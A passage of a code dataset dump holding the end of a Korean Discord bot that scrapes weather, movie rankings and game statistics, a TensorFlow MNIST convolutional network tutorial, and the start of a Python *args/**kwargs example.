client.send_message(message.channel, embed=embed)\r\n\r\n if message.content.startswith(\"!날씨\"):\r\n learn= message.content.split(\" \")\r\n\r\n location = learn[1]\r\n\r\n enc_location = urllib.parse.quote(location + '날씨')\r\n\r\n hdr = {'User-Agent': 'Mozilla/5.0'}\r\n\r\n url = 'https://search.naver.com/search.naver?where=nexearch&sm=top_hty&fbm=1&ie=utf8&query=' + enc_location\r\n\r\n print(url)\r\n\r\n req = Request(url, headers=hdr)\r\n\r\n html = urllib.request.urlopen(req)\r\n\r\n bsObj = bs4.BeautifulSoup(html, \"html.parser\")\r\n\r\n todayBase = bsObj.find('div', {'class': 'main_info'})\r\n\r\n todayTemp1 = todayBase.find('span', {'class': 'todaytemp'})\r\n\r\n todayTemp = todayTemp1.text.strip() # 온도\r\n\r\n print(todayTemp)\r\n\r\n todayValueBase = todayBase.find('ul', {'class': 'info_list'})\r\n\r\n todayValue2 = todayValueBase.find('p', {'class': 'cast_txt'})\r\n\r\n todayValue = todayValue2.text.strip() # 밝음,어제보다 ?도 높거나 낮음을 나타내줌\r\n\r\n print(todayValue)\r\n\r\n todayFeelingTemp1 = todayValueBase.find('span', {'class': 'sensible'})\r\n\r\n todayFeelingTemp = todayFeelingTemp1.text.strip() # 체감온도\r\n\r\n print(todayFeelingTemp)\r\n\r\n todayMiseaMongi1 = bsObj.find('div', {'class': 'sub_info'})\r\n\r\n todayMiseaMongi2 = todayMiseaMongi1.find('div', {'class': 'detail_box'})\r\n\r\n todayMiseaMongi3 = todayMiseaMongi2.find('dd')\r\n\r\n todayMiseaMongi = todayMiseaMongi3.text # 미세먼지\r\n\r\n print(todayMiseaMongi)\r\n\r\n tomorrowBase = bsObj.find('div', {'class': 'table_info weekly _weeklyWeather'})\r\n\r\n tomorrowTemp1 = tomorrowBase.find('li', {'class': 'date_info'})\r\n\r\n tomorrowTemp2 = tomorrowTemp1.find('dl')\r\n\r\n tomorrowTemp3 = tomorrowTemp2.find('dd')\r\n\r\n tomorrowTemp = tomorrowTemp3.text.strip() # 오늘 오전,오후온도\r\n\r\n print(tomorrowTemp)\r\n\r\n tomorrowAreaBase = bsObj.find('div', {'class': 'tomorrow_area'})\r\n\r\n tomorrowMoring1 = tomorrowAreaBase.find('div', {'class': 'main_info morning_box'})\r\n\r\n tomorrowMoring2 = tomorrowMoring1.find('span', {'class': 'todaytemp'})\r\n\r\n tomorrowMoring = tomorrowMoring2.text.strip() # 내일 오전 온도\r\n\r\n print(tomorrowMoring)\r\n\r\n tomorrowValue1 = tomorrowMoring1.find('div', {'class': 'info_data'})\r\n\r\n tomorrowValue = tomorrowValue1.text.strip() # 내일 오전 날씨상태, 미세먼지 상태\r\n\r\n print(tomorrowValue)\r\n\r\n tomorrowAreaBase = bsObj.find('div', {'class': 'tomorrow_area'})\r\n\r\n tomorrowAllFind = tomorrowAreaBase.find_all('div', {'class': 'main_info morning_box'})\r\n\r\n tomorrowAfter1 = tomorrowAllFind[1]\r\n\r\n tomorrowAfter2 = tomorrowAfter1.find('p', {'class': 'info_temperature'})\r\n\r\n tomorrowAfter3 = tomorrowAfter2.find('span', {'class': 'todaytemp'})\r\n\r\n tomorrowAfterTemp = tomorrowAfter3.text.strip() # 내일 오후 온도\r\n\r\n print(tomorrowAfterTemp)\r\n\r\n tomorrowAfterValue1 = tomorrowAfter1.find('div', {'class': 'info_data'})\r\n\r\n tomorrowAfterValue = tomorrowAfterValue1.text.strip()\r\n\r\n print(tomorrowAfterValue) # 내일 오후 날씨상태,미세먼지\r\n\r\n embed = discord.Embed(\r\n\r\n title=learn[1] + ' 날씨 정보',\r\n\r\n description=learn[1] + '날씨 정보입니다.',\r\n\r\n colour=discord.Colour.gold()\r\n\r\n )\r\n\r\n embed.add_field(name='현재온도', value=todayTemp + '˚', inline=False) # 현재온도\r\n\r\n embed.add_field(name='체감온도', value=todayFeelingTemp, inline=False) # 체감온도\r\n\r\n embed.add_field(name='현재상태', value=todayValue, inline=False) # 밝음,어제보다 ?도 높거나 낮음을 나타내줌\r\n\r\n embed.add_field(name='현재 미세먼지 상태', value=todayMiseaMongi, inline=False) # 오늘 미세먼지\r\n\r\n embed.add_field(name='오늘 오전/오후 날씨', value=tomorrowTemp, inline=False) # 오늘날씨 # color=discord.Color.blue()\r\n\r\n embed.add_field(name='**----------------------------------**', value='**----------------------------------**',\r\n inline=False) # 구분선\r\n\r\n embed.add_field(name='내일 오전온도', value=tomorrowMoring + '˚', inline=False) # 내일오전날씨\r\n\r\n embed.add_field(name='내일 오전날씨상태, 미세먼지 상태', value=tomorrowValue, inline=False) # 내일오전 날씨상태\r\n\r\n embed.add_field(name='내일 오후온도', value=tomorrowAfterTemp + '˚', inline=False) # 내일오후날씨\r\n\r\n embed.add_field(name='내일 오후날씨상태, 미세먼지 상태', value=tomorrowAfterValue, inline=False) # 내일오후 날씨상태\r\n\r\n await client.send_message(message.channel, embed=embed)\r\n\r\n if message.content.startswith('!영화순위'):\r\n\r\n # http://ticket2.movie.daum.net/movie/movieranklist.aspx\r\n\r\n i1 = 0 # 랭킹 string값\r\n\r\n embed = discord.Embed(\r\n\r\n title=\"영화순위\",\r\n\r\n description=\"영화순위입니다.\",\r\n\r\n colour=discord.Color.red()\r\n\r\n )\r\n\r\n hdr = {'User-Agent': 'Mozilla/5.0'}\r\n\r\n url = 'http://ticket2.movie.daum.net/movie/movieranklist.aspx'\r\n\r\n print(url)\r\n\r\n req = Request(url, headers=hdr)\r\n\r\n html = urllib.request.urlopen(req)\r\n\r\n bsObj = bs4.BeautifulSoup(html, \"html.parser\")\r\n\r\n moviechartBase = bsObj.find('div', {'class': 'main_detail'})\r\n\r\n moviechart1 = moviechartBase.find('ul', {'class': 'list_boxthumb'})\r\n\r\n moviechart2 = moviechart1.find_all('li')\r\n\r\n for i in range(0, 20):\r\n i1 = i1 + 1\r\n\r\n stri1 = str(i1) # i1은 영화랭킹을 나타내는데 사용됩니다\r\n\r\n print()\r\n\r\n print(i)\r\n\r\n print()\r\n\r\n moviechartLi1 = moviechart2[i] # ------------------------- 1등랭킹 영화---------------------------\r\n\r\n moviechartLi1Div = moviechartLi1.find('div', {'class': 'desc_boxthumb'}) # 영화박스 나타내는 Div\r\n\r\n moviechartLi1MovieName1 = moviechartLi1Div.find('strong', {'class': 'tit_join'})\r\n\r\n moviechartLi1MovieName = moviechartLi1MovieName1.text.strip() # 영화 제목\r\n\r\n print(moviechartLi1MovieName)\r\n\r\n moviechartLi1Ratting1 = moviechartLi1Div.find('div', {'class': 'raking_grade'})\r\n\r\n moviechartLi1Ratting2 = moviechartLi1Ratting1.find('em', {'class': 'emph_grade'})\r\n\r\n moviechartLi1Ratting = moviechartLi1Ratting2.text.strip() # 영화 평점\r\n\r\n print(moviechartLi1Ratting)\r\n\r\n moviechartLi1openDay1 = moviechartLi1Div.find('dl', {'class': 'list_state'})\r\n\r\n moviechartLi1openDay2 = moviechartLi1openDay1.find_all('dd') # 개봉날짜, 예매율 두개포함한 dd임\r\n\r\n moviechartLi1openDay3 = moviechartLi1openDay2[0]\r\n\r\n moviechartLi1Yerating1 = moviechartLi1openDay2[1]\r\n\r\n moviechartLi1openDay = moviechartLi1openDay3.text.strip() # 개봉날짜\r\n\r\n print(moviechartLi1openDay)\r\n\r\n moviechartLi1Yerating = moviechartLi1Yerating1.text.strip() # 예매율 ,랭킹변동\r\n\r\n print(moviechartLi1Yerating) # ------------------------- 1등랭킹 영화---------------------------\r\n\r\n print()\r\n\r\n embed.add_field(name='---------------랭킹' + stri1 + '위---------------',\r\n value='\\n영화제목 : ' + moviechartLi1MovieName + '\\n영화평점 : ' + moviechartLi1Ratting + '점' + '\\n개봉날짜 : ' + moviechartLi1openDay + '\\n예매율,랭킹변동 : ' + moviechartLi1Yerating,\r\n inline=False) # 영화랭킹\r\n\r\n await client.send_message(message.channel, embed=embed)\r\n\r\n if message.content.startswith('!오늘배그'):\r\n\r\n randomNum = random.randrange(1, 3)\r\n\r\n if randomNum == 1:\r\n\r\n await client.send_message(message.channel, embed=discord.Embed(title=\"배그각입니다.\", color=discord.Color.blue()))\r\n\r\n else:\r\n\r\n await client.send_message(message.channel,\r\n embed=discord.Embed(title=\"자러갑시다....\", color=discord.Color.red()))\r\n\r\n\r\n if message.content.startswith('!초대'):\r\n msg = '{0.author.mention}'.format(message)\r\n\r\n await client.send_message(message.channel, msg)\r\n\r\n channel = message.channel\r\n\r\n embed = discord.Embed(title=\"서버 들어가기\", url=\"https://discord.gg/BFWDUQe\", description=\"↑서버들어가기\", color=0x25a76a)\r\n\r\n embed.set_author(name=\"SAINC Bot 입니다\", icon_url=\"https://cdn.discordapp.com/attachments/536048659784007711/536070315915214850/Hot_Concrete_Text_Effect_preview.jpg\")\r\n\r\n embed.set_thumbnail(url=\"https://cdn.discordapp.com/attachments/536048659784007711/536070315915214850/Hot_Concrete_Text_Effect_preview.jpg\")\r\n\r\n await client.send_message(channel, embed=embed)\r\n\r\n await client.send_message(message.channel, \"https://discord.gg/BFWDUQe\")\r\n\r\n if message.content.startswith('!명령어'):\r\n channel = message.channel\r\n\r\n embed = discord.Embed(title=\"ㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡ\", color=0x2d0606)\r\n\r\n embed.set_author(name=\"SAINC Bot 전용\", icon_url = \"https://images-ext-1.discordapp.net/external/7bopmZQ6jonvlN90L05AeKE_sX9KG61JR-Uv4sKVSeU/https/cdn.discordapp.com/attachments/536048659784007711/536070315915214850/Hot_Concrete_Text_Effect_preview.jpg\")\r\n\r\n embed.set_thumbnail(url=\"https://images-ext-1.discordapp.net/external/7bopmZQ6jonvlN90L05AeKE_sX9KG61JR-Uv4sKVSeU/https/cdn.discordapp.com/attachments/536048659784007711/536070315915214850/Hot_Concrete_Text_Effect_preview.jpg\")\r\n\r\n embed.add_field(name='!안녕', value='인사를 받아줍니다.', inline=False)\r\n\r\n embed.add_field(name='!날씨 (지역)', value='그 지역의 날씨정보를 제공합니다.', inline=False)\r\n\r\n embed.add_field(name='!초대', value='서버초대 링크를 올려줍니다.', inline=False)\r\n\r\n embed.add_field(name='!오늘배그', value='오늘배그각을 알려줍니다.', inline=False)\r\n\r\n embed.add_field(name='!전적메뉴', value='전적메뉴를 불러옵니다.', inline=False)\r\n\r\n embed.add_field(name='!이미지 (제시어)', value='제시어와관련된 이미지를 올려줍니다.', inline=False)\r\n\r\n embed.add_field(name='!타이머 (초)', value='타이머로 시간을재줍니다.', inline=False)\r\n\r\n embed.add_field(name='!영화순위', value='실시간 영화순위를 올려줍니다.', inline=False)\r\n\r\n embed.add_field(name='!제비뽑기', value='제비뽑기로 순서를 정해줍니다.', inline=False)\r\n\r\n embed.add_field(name='!실시간검색어,!실검', value='실시간검색어를 알려줍니다.', inline=False)\r\n\r\n await client.send_message(channel, embed=embed)\r\n\r\n if message.content.startswith('!실행중'):\r\n learn = message.content.split(\" \")\r\n text = learn[1]\r\n await client.change_presence(game=discord.Game(name=text, type=1))\r\n await client.send_message(message.channel,\r\n embed=discord.Embed(title=text + \" 플레이 중으로 변경되었습니다.\", color=discord.Color.dark_gold()))\r\n\r\n\r\n if message.content.startswith(\"!전적메뉴\"):\r\n channel = message.channel\r\n\r\n embed = discord.Embed(\r\n\r\n title='SAINC 명령어입니다.',\r\n\r\n description='[도배금지]',\r\n\r\n colour=discord.Colour.purple()\r\n\r\n )\r\n\r\n embed.set_footer(text='모든 전적은 dak.gg 기준입니다.')\r\n\r\n embed.add_field(name='!롤', value='!롤 닉네임 형식으로 적으면 그 닉네임에대한 정보를 알려줍니다..', inline=False)\r\n\r\n embed.add_field(name='!배그솔로', value='!배그솔로 닉네임 형식으로 적으면 그 닉네임에대한 정보를 알려줍니다..', inline=False)\r\n\r\n embed.add_field(name='!배그듀오', value='!배그듀오 닉네임 형식으로 적으면 그 닉네임에대한 정보를 알려줍니다..', inline=False)\r\n\r\n embed.add_field(name='!배그스쿼드', value='!배그스쿼드 닉네임 형식으로 적으면 그 닉네임에대한 정보를 알려줍니다..', inline=False)\r\n\r\n embed.add_field(name='아래파란버튼을 누르면 dak.gg에 들어가집니다.', value='[dak.gg들어가기](https://www.dak.gg/)', inline=False)\r\n\r\n await client.send_message(channel, embed=embed)\r\n\r\n\r\n\r\n if message.content.startswith(\"!롤\"):\r\n\r\n learn = message.content.split(\" \")\r\n\r\n location = learn[1]\r\n\r\n enc_location = urllib.parse.quote(location)\r\n\r\n url = \"http://www.op.gg/summoner/userName=\" + enc_location\r\n\r\n html = urllib.request.urlopen(url)\r\n\r\n bsObj = bs4.BeautifulSoup(html, \"html.parser\")\r\n\r\n rank1 = bsObj.find(\"div\", {\"class\": \"TierRankInfo\"})\r\n\r\n rank2 = rank1.find(\"div\", {\"class\": \"TierRank\"})\r\n\r\n rank3 = rank2.find(\"span\", {\"class\": \"tierRank\"})\r\n\r\n rank4 = rank3.text # 티어표시 (브론즈1,2,3,4,5 등등)\r\n\r\n print(rank4)\r\n\r\n if rank4 != 'Unranked':\r\n jumsu1 = rank1.find(\"div\", {\"class\": \"TierInfo\"})\r\n\r\n jumsu2 = jumsu1.find(\"span\", {\"class\": \"LeaguePoints\"})\r\n\r\n jumsu3 = jumsu2.text\r\n\r\n jumsu4 = jumsu3.strip() # 점수표시 (11LP등등)\r\n\r\n print(jumsu4)\r\n\r\n winlose1 = jumsu1.find(\"span\", {\"class\": \"WinLose\"})\r\n\r\n winlose2 = winlose1.find(\"span\", {\"class\": \"wins\"})\r\n\r\n winlose2_1 = winlose1.find(\"span\", {\"class\": \"losses\"})\r\n\r\n winlose2_2 = winlose1.find(\"span\", {\"class\": \"winratio\"})\r\n\r\n winlose2txt = winlose2.text\r\n\r\n winlose2_1txt = winlose2_1.text\r\n\r\n winlose2_2txt = winlose2_2.text # 승,패,승률 나타냄 200W 150L Win Ratio 55% 등등\r\n\r\n print(winlose2txt + \" \" + winlose2_1txt + \" \" + winlose2_2txt)\r\n\r\n channel = message.channel\r\n\r\n embed = discord.Embed(\r\n\r\n title='롤 정보',\r\n\r\n description='롤 정보입니다.',\r\n\r\n colour=discord.Colour.purple()\r\n\r\n )\r\n\r\n if rank4 == 'Unranked':\r\n\r\n embed.add_field(name='당신의 티어', value=rank4, inline=False)\r\n\r\n embed.add_field(name='-당신은 언랭-', value=\"언랭은 더이상의 정보는 제공하지 않습니다.\", inline=False)\r\n\r\n await client.send_message(channel, embed=embed)\r\n\r\n\r\n\r\n else:\r\n\r\n embed.add_field(name='당신의 티어', value=rank4, inline=False)\r\n\r\n embed.add_field(name='당신의 LP(점수)', value=jumsu4, inline=False)\r\n\r\n embed.add_field(name='당신의 승,패 정보', value=winlose2txt + \" \" + winlose2_1txt, inline=False)\r\n\r\n embed.add_field(name='당신의 승률', value=winlose2_2txt, inline=False)\r\n\r\n await client.send_message(channel, embed=embed)\r\n\r\n\r\n\r\n if message.content.startswith(\"!배그솔로\"):\r\n\r\n learn = message.content.split(\" \")\r\n\r\n location = learn[1]\r\n\r\n enc_location = urllib.parse.quote(location)\r\n\r\n url = \"https://dak.gg/profile/\" + enc_location\r\n\r\n html = urllib.request.urlopen(url)\r\n\r\n bsObj = bs4.BeautifulSoup(html, \"html.parser\")\r\n\r\n solo1 = bsObj.find(\"div\", {\"class\": \"overview\"})\r\n\r\n solo2 = solo1.text\r\n\r\n solo3 = solo2.strip()\r\n\r\n channel = message.channel\r\n\r\n embed = discord.Embed(\r\n\r\n title='배그솔로 정보',\r\n\r\n description='배그솔로 정보입니다.',\r\n\r\n colour=discord.Colour.purple())\r\n\r\n if solo3 == \"No record\":\r\n\r\n print(\"솔로 경기가 없습니다.\")\r\n\r\n embed.add_field(name='배그를 한판이라도 해주세요', value='솔로 경기 전적이 없습니다..', inline=False)\r\n\r\n await client.send_message(channel, embed=embed)\r\n\r\n\r\n\r\n\r\n\r\n else:\r\n\r\n solo4 = solo1.find(\"span\", {\"class\": \"value\"})\r\n\r\n soloratting = solo4.text # -------솔로레이팅---------\r\n\r\n solorank0_1 = solo1.find(\"div\", {\"class\": \"grade-info\"})\r\n\r\n solorank0_2 = solorank0_1.text\r\n\r\n solorank = solorank0_2.strip() # -------랭크(그마,브론즈)---------\r\n\r\n print(\"레이팅 : \" + soloratting)\r\n\r\n print(\"등급 : \" + solorank)\r\n\r\n print(\"\")\r\n\r\n embed.add_field(name='레이팅', value=soloratting, inline=False)\r\n\r\n embed.add_field(name='등급', value=solorank, inline=False)\r\n\r\n soloKD1 = bsObj.find(\"div\", {\"class\": \"kd stats-item stats-top-graph\"})\r\n\r\n soloKD2 = soloKD1.find(\"p\", {\"class\": \"value\"})\r\n\r\n soloKD3 = soloKD2.text\r\n\r\n soloKD = soloKD3.strip() # -------킬뎃(2.0---------\r\n\r\n soloSky1 = soloKD1.find(\"span\", {\"class\": \"top\"})\r\n\r\n soloSky2 = soloSky1.text # -------상위10.24%---------\r\n\r\n print(\"킬뎃 : \" + soloKD)\r\n\r\n print(\"킬뎃상위 : \" + soloSky2)\r\n\r\n print(\"\")\r\n\r\n embed.add_field(name='킬뎃,킬뎃상위', value=soloKD + \" \" + soloSky2, inline=False)\r\n\r\n # embed.add_field(name='킬뎃상위', value=soloSky2, inline=False)\r\n\r\n soloWinRat1 = bsObj.find(\"div\", {\"class\": \"stats\"}) # 박스\r\n\r\n soloWinRat2 = soloWinRat1.find(\"div\", {\"class\": \"winratio stats-item stats-top-graph\"})\r\n\r\n soloWinRat3 = soloWinRat2.find(\"p\", {\"class\": \"value\"})\r\n\r\n soloWinRat = soloWinRat3.text.strip() # -------승률---------\r\n\r\n soloWinRatSky1 = soloWinRat2.find(\"span\", {\"class\": \"top\"})\r\n\r\n soloWinRatSky = soloWinRatSky1.text.strip() # -------상위?%---------\r\n\r\n print(\"승률 : \" + soloWinRat)\r\n\r\n print(\"승률상위 : \" + soloWinRatSky)\r\n\r\n print(\"\")\r\n\r\n embed.add_field(name='승률,승률상위', value=soloWinRat + \" \" + soloWinRatSky, inline=False)\r\n\r\n # embed.add_field(name='승률상위', value=soloWinRatSky, inline=False)\r\n\r\n soloHead1 = soloWinRat1.find(\"div\", {\"class\": \"headshots stats-item stats-top-graph\"})\r\n\r\n soloHead2 = soloHead1.find(\"p\", {\"class\": \"value\"})\r\n\r\n soloHead = soloHead2.text.strip() # -------헤드샷---------\r\n\r\n soloHeadSky1 = soloHead1.find(\"span\", {\"class\": \"top\"})\r\n\r\n soloHeadSky = soloHeadSky1.text.strip() # # -------상위?%---------\r\n\r\n print(\"헤드샷 : \" + soloHead)\r\n\r\n print(\"헤드샷상위 : \" + soloHeadSky)\r\n\r\n print(\"\")\r\n\r\n embed.add_field(name='헤드샷,헤드샷상위', value=soloHead + \" \" + soloHeadSky, inline=False)\r\n\r\n # embed.add_field(name='헤드샷상위', value=soloHeadSky, inline=False)\r\n\r\n await client.send_message(channel, embed=embed)\r\n\r\n\r\n if message.content.startswith(\"!배그듀오\"):\r\n\r\n learn = message.content.split(\" \")\r\n\r\n location = learn[1]\r\n\r\n enc_location = urllib.parse.quote(location)\r\n\r\n url = \"https://dak.gg/profile/\" + enc_location\r\n\r\n html = urllib.request.urlopen(url)\r\n\r\n bsObj = bs4.BeautifulSoup(html, \"html.parser\")\r\n\r\n duoCenter1 = bsObj.find(\"section\", {\"class\": \"duo modeItem\"})\r\n\r\n duoRecord1 = duoCenter1.find(\"div\", {\"class\": \"overview\"})\r\n\r\n duoRecord = duoRecord1.text.strip() # ----기록이없습니다 문구----\r\n\r\n print(duoRecord)\r\n\r\n channel = message.channel\r\n\r\n embed = discord.Embed(\r\n\r\n title='배그듀오 정보',\r\n\r\n description='배그듀오 정보입니다.',\r\n\r\n colour=discord.Colour.purple())\r\n\r\n if duoRecord == 'No record':\r\n\r\n print('듀오 경기가 없습니다.')\r\n\r\n embed.add_field(name='배그를 한판이라도 해주세요', value='듀오 경기 전적이 없습니다..', inline=False)\r\n\r\n await client.send_message(channel, embed=embed)\r\n\r\n\r\n\r\n\r\n\r\n else:\r\n\r\n duoRat1 = duoRecord1.find(\"span\", {\"class\": \"value\"})\r\n\r\n duoRat = duoRat1.text.strip() # ----레이팅----\r\n\r\n duoRank1 = duoRecord1.find(\"p\", {\"class\": \"grade-name\"})\r\n\r\n duoRank = duoRank1.text.strip() # ----등급----\r\n\r\n print(duoRank)\r\n\r\n embed.add_field(name='레이팅', value=duoRat, inline=False)\r\n\r\n embed.add_field(name='등급', value=duoRank, inline=False)\r\n\r\n duoStat = duoCenter1.find(\"div\", {\"class\": \"stats\"})\r\n\r\n duoKD1 = duoStat.find(\"div\", {\"class\": \"kd stats-item stats-top-graph\"})\r\n\r\n duoKD2 = duoKD1.find(\"p\", {\"class\": \"value\"})\r\n\r\n duoKD = duoKD2.text.strip() # ----킬뎃----\r\n\r\n duoKdSky1 = duoStat.find(\"span\", {\"class\": \"top\"})\r\n\r\n duoKdSky = duoKdSky1.text.strip() # ----킬뎃 상위?%----\r\n\r\n print(duoKD)\r\n\r\n print(duoKdSky)\r\n\r\n embed.add_field(name='킬뎃,킬뎃상위', value=duoKD + \" \" + duoKdSky, inline=False)\r\n\r\n duoWinRat1 = duoStat.find(\"div\", {\"class\": \"winratio stats-item stats-top-graph\"})\r\n\r\n duoWinRat2 = duoWinRat1.find(\"p\", {\"class\": \"value\"})\r\n\r\n duoWinRat = duoWinRat2.text.strip() # ----승률----\r\n\r\n duoWinRatSky1 = duoWinRat1.find(\"span\", {\"class\": \"top\"})\r\n\r\n duoWinRatSky = duoWinRatSky1.text.strip() # ----승률 상위?%----\r\n\r\n print(duoWinRat)\r\n\r\n print(duoWinRatSky)\r\n\r\n embed.add_field(name='승률,승률상위', value=duoWinRat + \" \" + duoWinRatSky, inline=False)\r\n\r\n duoHead1 = duoStat.find(\"div\", {\"class\": \"headshots\"})\r\n\r\n duoHead2 = duoHead1.find(\"p\", {\"class\": \"value\"})\r\n\r\n duoHead = duoHead2.text.strip() # ----헤드샷----\r\n\r\n duoHeadSky1 = duoHead1.find(\"span\", {\"class\": \"top\"})\r\n\r\n duoHeadSky = duoHeadSky1.text.strip() # ----헤드샷 상위?%----\r\n\r\n print(duoHead)\r\n\r\n print(duoHeadSky)\r\n\r\n embed.add_field(name='헤드샷,헤드샷상위', value=duoHead + \" \" + duoHeadSky, inline=False)\r\n\r\n await client.send_message(channel, embed=embed)\r\n\r\n\r\n if message.content.startswith(\"!배그스쿼드\"):\r\n\r\n learn = message.content.split(\" \")\r\n\r\n location = learn[1]\r\n\r\n enc_location = urllib.parse.quote(location)\r\n\r\n url = \"https://dak.gg/profile/\" + enc_location\r\n\r\n html = urllib.request.urlopen(url)\r\n\r\n bsObj = bs4.BeautifulSoup(html, \"html.parser\")\r\n\r\n duoCenter1 = bsObj.find(\"section\", {\"class\": \"squad modeItem\"})\r\n\r\n duoRecord1 = duoCenter1.find(\"div\", {\"class\": \"overview\"})\r\n\r\n duoRecord = duoRecord1.text.strip() # ----기록이없습니다 문구----\r\n\r\n print(duoRecord)\r\n\r\n channel = message.channel\r\n\r\n embed = discord.Embed(\r\n\r\n title='배그스쿼드 정보',\r\n\r\n description='배그스쿼드 정보입니다.',\r\n\r\n colour=discord.Colour.purple())\r\n\r\n if duoRecord == 'No record':\r\n\r\n print('스쿼드 경기가 없습니다.')\r\n\r\n embed.add_field(name='배그를 한판이라도 해주세요', value='스쿼드 경기 전적이 없습니다..', inline=False)\r\n\r\n await client.send_message(channel, embed=embed)\r\n\r\n\r\n\r\n else:\r\n\r\n duoRat1 = duoRecord1.find(\"span\", {\"class\": \"value\"})\r\n\r\n duoRat = duoRat1.text.strip() # ----레이팅----\r\n\r\n duoRank1 = duoRecord1.find(\"p\", {\"class\": \"grade-name\"})\r\n\r\n duoRank = duoRank1.text.strip() # ----등급----\r\n\r\n print(duoRank)\r\n\r\n embed.add_field(name='레이팅', value=duoRat, inline=False)\r\n\r\n embed.add_field(name='등급', value=duoRank, inline=False)\r\n\r\n duoStat = duoCenter1.find(\"div\", {\"class\": \"stats\"})\r\n\r\n duoKD1 = duoStat.find(\"div\", {\"class\": \"kd stats-item stats-top-graph\"})\r\n\r\n duoKD2 = duoKD1.find(\"p\", {\"class\": \"value\"})\r\n\r\n duoKD = duoKD2.text.strip() # ----킬뎃----\r\n\r\n duoKdSky1 = duoStat.find(\"span\", {\"class\": \"top\"})\r\n\r\n duoKdSky = duoKdSky1.text.strip() # ----킬뎃 상위?%----\r\n\r\n print(duoKD)\r\n\r\n print(duoKdSky)\r\n\r\n embed.add_field(name='킬뎃,킬뎃상위', value=duoKD + \" \" + duoKdSky, inline=False)\r\n\r\n duoWinRat1 = duoStat.find(\"div\", {\"class\": \"winratio stats-item stats-top-graph\"})\r\n\r\n duoWinRat2 = duoWinRat1.find(\"p\", {\"class\": \"value\"})\r\n\r\n duoWinRat = duoWinRat2.text.strip() # ----승률----\r\n\r\n duoWinRatSky1 = duoWinRat1.find(\"span\", {\"class\": \"top\"})\r\n\r\n duoWinRatSky = duoWinRatSky1.text.strip() # ----승률 상위?%----\r\n\r\n print(duoWinRat)\r\n\r\n print(duoWinRatSky)\r\n\r\n embed.add_field(name='승률,승률상위', value=duoWinRat + \" \" + duoWinRatSky, inline=False)\r\n\r\n duoHead1 = duoStat.find(\"div\", {\"class\": \"headshots\"})\r\n\r\n duoHead2 = duoHead1.find(\"p\", {\"class\": \"value\"})\r\n\r\n duoHead = duoHead2.text.strip() # ----헤드샷----\r\n\r\n duoHeadSky1 = duoHead1.find(\"span\", {\"class\": \"top\"})\r\n\r\n duoHeadSky = duoHeadSky1.text.strip() # ----헤드샷 상위?%----\r\n\r\n print(duoHead)\r\n\r\n print(duoHeadSky)\r\n\r\n embed.add_field(name='헤드샷,헤드샷상위', value=duoHead + \" \" + duoHeadSky, inline=False)\r\n\r\n await client.send_message(channel, embed=embed)\r\n\r\naccess_tonken = os.environ[\"BOT_TOKEN\"] \r\nclient.run(access_token)\r\n","sub_path":"SAINC.py","file_name":"SAINC.py","file_ext":"py","file_size_in_byte":32492,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"162264963","text":"import tensorflow as tf\nfrom tensorflow.examples.tutorials.mnist import input_data\n\nmnist = input_data.read_data_sets(\"MNIST_data/\", one_hot=True)\n\n\ndef filter_variable(shape):\n initial = tf.truncated_normal(shape, stddev=0.1)\n return tf.Variable(initial)\n\n\ndef bias_variable(shape):\n initial = tf.constant(0.1, shape=shape)\n return tf.Variable(initial)\n\n\ndef conv2d(x, w):\n return tf.nn.conv2d(x, w, strides=[1, 1, 1, 1], padding='SAME')\n\n\ndef max_pool_2_2(x):\n return tf.nn.max_pool(x, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='SAME')\n\n\nif __name__ == \"__main__\":\n import os\n os.environ['Tf_CPP-MIN-LOG-LEVEL'] = '2'\n\n x = tf.placeholder('float', shape=[None, 784])\n # 输入图像是由2维的浮点数tensor组成的,这里我们分配给它的形状是[None,784],\n # 其中784表示一个28x28像素点的MNIST图像单一展开的维度,\n # None表示第一个维度,与batch的大小有关,它可以是任意大小,即输入图像数量不唯一\n y = tf.placeholder('float', shape=[None, 10])\n\n f_conv1 = filter_variable([5, 5, 1, 32])\n b_conv1 = bias_variable([32])\n x_image = tf.reshape(x, [-1, 28, 28, 1]) # -1表示取出所有的数据\n\n h_conv1 = tf.nn.relu(conv2d(x_image, f_conv1)+b_conv1)\n h_pool1 = max_pool_2_2(h_conv1)\n\n f_conv2 = filter_variable([5, 5, 32, 64])\n b_conv2 = bias_variable([64])\n h_conv2 = tf.nn.relu(conv2d(h_pool1, f_conv2)+b_conv2)\n h_pool2 = max_pool_2_2(h_conv2)\n\n # 28 / 2 / 2\n w_fc1 = filter_variable([7*7*64, 1024])\n b_fc1 = bias_variable([1024])\n\n h_pool2_flat = tf.reshape(h_pool2, [-1, 7*7*64])\n h_fc1 = tf.nn.relu(tf.matmul(h_pool2_flat, w_fc1)+b_fc1)\n\n keep_prob = tf.placeholder(tf.float32)\n h_fc1_drop = tf.nn.dropout(h_fc1, keep_prob)\n\n w_fc2 = filter_variable([1024, 10])\n b_fc2 = bias_variable([10])\n\n y_conv = tf.nn.softmax(tf.matmul(h_fc1_drop, w_fc2)+b_fc2)\n\n cross_entropy = -tf.reduce_sum(y*tf.log(y_conv))\n train_step = tf.train.AdamOptimizer(1e-4).minimize(cross_entropy)\n correction_prediction = tf.equal(tf.argmax(y, 1), tf.argmax(y_conv, 1))\n accuracy = tf.reduce_mean(tf.cast(correction_prediction, 'float'))\n with tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n for i in range(1000):\n batch = mnist.train.next_batch(50)\n if i % 100 == 0:\n train_accuracy = accuracy.eval(session=sess, feed_dict={\n x: batch[0], y: batch[1], keep_prob: 1.0})\n print(\"step %d, accuracy %g\" % (i, train_accuracy))\n train_step.run(session=sess, feed_dict={x: batch[0], y: batch[1], keep_prob: 0.5})\n print(\"test accuracy %g\" % accuracy.eval(session=sess, feed_dict={\n x: mnist.test.images, y: mnist.test.labels, keep_prob: 1.0\n }))\n # 打印出测试集的结果\n","sub_path":"dl_tf/mnist.py","file_name":"mnist.py","file_ext":"py","file_size_in_byte":2886,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"199859161","text":"# -*- coding: utf-8 -*-\n\ndef test_var_args(f_arg, *argv):\n print(\"first normal arg:\", f_arg)\n for arg in argv:\n print(\"anothor arg through *argv:\", arg)\n\n\ndef greet_me(**kwargs):\n for key, val in kwargs.items():\n print(\"{0} == {1}\".format(key, val))\n\n\ndef test_argv_kwargv(arg1, arg2, arg3):\n print(\"arg1:\", 